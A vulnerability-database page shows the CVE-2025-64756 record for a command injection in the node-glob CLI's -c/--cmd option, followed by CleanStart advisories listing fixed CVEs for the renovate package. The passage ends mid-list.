Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64756 (GCVE-0-2025-64756)
Vulnerability from cvelistv5 – Published: 2025-11-17 17:29 – Updated: 2025-11-19 02:30- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
| URL | Tags |
|---|---|
| https://github.com/isaacs/node-glob/security/advi… | x_refsource_CONFIRM |
| https://github.com/isaacs/node-glob/commit/1e4e29… | x_refsource_MISC |
| https://github.com/isaacs/node-glob/commit/47473c… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64756",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-17T18:24:55.363466Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-18T16:37:11.917Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "node-glob",
"vendor": "isaacs",
"versions": [
{
"status": "affected",
"version": "\u003e= 10.2.0, \u003c 10.5.0"
},
{
"status": "affected",
"version": "\u003e= 11.0.0, \u003c 11.1.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-19T02:30:44.520Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
},
{
"name": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
},
{
"name": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
}
],
"source": {
"advisory": "GHSA-5j98-mcp5-4vw2",
"discovery": "UNKNOWN"
},
"title": "glob CLI: Command injection via -c/--cmd executes matches with shell:true"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64756",
"datePublished": "2025-11-17T17:29:08.029Z",
"dateReserved": "2025-11-10T22:29:34.874Z",
"dateUpdated": "2025-11-19T02:30:44.520Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-64756",
"date": "2026-06-06",
"epss": "0.00025",
"percentile": "0.07595"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64756\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-17T18:15:58.270\",\"lastModified\":\"2025-12-02T19:34:43.270\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"10.2.0\",\"versionEndExcluding\":\"10.5.0\",\"matchCriteriaId\":\"3C8601DB-5326-473F-8AB9-6F66833AC884\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"11.0.0\",\"versionEndExcluding\":\"11.1.0\",\"matchCriteriaId\":\"F7828865-293E-4DB7-AC94-A3C1027E25A1\"}]}]}],\"references\":[{\"url\":\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64756\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-17T18:24:55.363466Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-18T16:37:07.785Z\"}}], \"cna\": {\"title\": \"glob CLI: Command injection via -c/--cmd executes matches with shell:true\", \"source\": {\"advisory\": \"GHSA-5j98-mcp5-4vw2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"isaacs\", \"product\": \"node-glob\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 10.2.0, \u003c 10.5.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 11.0.0, \u003c 11.1.0\"}]}], \"references\": [{\"url\": \"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\", \"name\": \"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\", \"name\": \"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146\", \"name\": \"https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-19T02:30:44.520Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64756\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-19T02:30:44.520Z\", \"dateReserved\": \"2025-11-10T22:29:34.874Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-17T17:29:08.029Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
cleanstart-2026-dv49099
Vulnerability from cleanstart
Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "renovate"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "43.4.4-r0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-DV49099",
"modified": "2026-03-23T10:49:42Z",
"published": "2026-04-01T09:31:16.419730Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-DV49099.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27942"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-25h7-pfq9-p65f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2mjp-6q6p-2qxm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-34x7-hfp2-rc4v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-37qj-frw5-hhjh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38c4-r59v-3vqw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4992-7rv2-5pvq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5j98-mcp5-4vw2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-73rr-hh4g-fpgx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7h2j-956f-4vf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8qq5-rm4j-mr97"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8wc6-vgrq-x6cf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jmr7-xgp7-cmfj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m7jm-9gc2-mpf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-phc3-fgpg-7m6h"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qpx9-hpmf-5gmw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r275-fr43-pm7q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6q2-hw4h-h46w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w7fw-mjwx-w883"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-64756, CVE-2025-69873, CVE-2026-1525, CVE-2026-1526, CVE-2026-1527, CVE-2026-1528, CVE-2026-2229, CVE-2026-2327, CVE-2026-23745, CVE-2026-2391, CVE-2026-24842, CVE-2026-25128, CVE-2026-25547, CVE-2026-2581, CVE-2026-25896, CVE-2026-26278, CVE-2026-26960, CVE-2026-27601, CVE-2026-27903, CVE-2026-27904, CVE-2026-27942, CVE-2026-28292, CVE-2026-29786, CVE-2026-31802, CVE-2026-32141, CVE-2026-33036, ghsa-23c5-xmqv-rm74, ghsa-25h7-pfq9-p65f, ghsa-2g4f-4pwh-qvx6, ghsa-2mjp-6q6p-2qxm, ghsa-34x7-hfp2-rc4v, ghsa-37qj-frw5-hhjh, ghsa-38c4-r59v-3vqw, ghsa-3ppc-4f35-3m26, ghsa-4992-7rv2-5pvq, ghsa-5j98-mcp5-4vw2, ghsa-73rr-hh4g-fpgx, ghsa-7h2j-956f-4vf2, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-8wc6-vgrq-x6cf, ghsa-9ppj-qmqm-q256, ghsa-f269-vfmq-vjvj, ghsa-fj3w-jwp8-x2g3, ghsa-jmr7-xgp7-cmfj, ghsa-m7jm-9gc2-mpf2, ghsa-phc3-fgpg-7m6h, ghsa-qffp-2rhf-9h96, ghsa-qpx9-hpmf-5gmw, ghsa-r275-fr43-pm7q, ghsa-r6q2-hw4h-h46w, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-w7fw-mjwx-w883 applied in versions: 43.4.4-r0",
"upstream": [
"CVE-2025-64756",
"CVE-2025-69873",
"CVE-2026-1525",
"CVE-2026-1526",
"CVE-2026-1527",
"CVE-2026-1528",
"CVE-2026-2229",
"CVE-2026-2327",
"CVE-2026-23745",
"CVE-2026-2391",
"CVE-2026-24842",
"CVE-2026-25128",
"CVE-2026-25547",
"CVE-2026-2581",
"CVE-2026-25896",
"CVE-2026-26278",
"CVE-2026-26960",
"CVE-2026-27601",
"CVE-2026-27903",
"CVE-2026-27904",
"CVE-2026-27942",
"CVE-2026-28292",
"CVE-2026-29786",
"CVE-2026-31802",
"CVE-2026-32141",
"CVE-2026-33036",
"ghsa-23c5-xmqv-rm74",
"ghsa-25h7-pfq9-p65f",
"ghsa-2g4f-4pwh-qvx6",
"ghsa-2mjp-6q6p-2qxm",
"ghsa-34x7-hfp2-rc4v",
"ghsa-37qj-frw5-hhjh",
"ghsa-38c4-r59v-3vqw",
"ghsa-3ppc-4f35-3m26",
"ghsa-4992-7rv2-5pvq",
"ghsa-5j98-mcp5-4vw2",
"ghsa-73rr-hh4g-fpgx",
"ghsa-7h2j-956f-4vf2",
"ghsa-7r86-cg39-jmmj",
"ghsa-83g3-92jg-28cx",
"ghsa-8gc5-j5rx-235r",
"ghsa-8qq5-rm4j-mr97",
"ghsa-8wc6-vgrq-x6cf",
"ghsa-9ppj-qmqm-q256",
"ghsa-f269-vfmq-vjvj",
"ghsa-fj3w-jwp8-x2g3",
"ghsa-jmr7-xgp7-cmfj",
"ghsa-m7jm-9gc2-mpf2",
"ghsa-phc3-fgpg-7m6h",
"ghsa-qffp-2rhf-9h96",
"ghsa-qpx9-hpmf-5gmw",
"ghsa-r275-fr43-pm7q",
"ghsa-r6q2-hw4h-h46w",
"ghsa-v9p9-hfj2-hcw8",
"ghsa-vrm6-8vpv-qv8q",
"ghsa-w7fw-mjwx-w883"
]
}
cleanstart-2026-nb51079
Vulnerability from cleanstart
Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.
| URL | Type | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "renovate"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "43.4.4-r0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-NB51079",
"modified": "2026-05-13T11:51:19Z",
"published": "2026-05-18T13:17:47.972643Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-NB51079.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27143"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27144"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27942"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32280"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32281"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32282"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32283"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32289"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33810"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35209"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42338"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-6951"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-25h7-pfq9-p65f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2mjp-6q6p-2qxm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-34x7-hfp2-rc4v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-37qj-frw5-hhjh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38c4-r59v-3vqw"
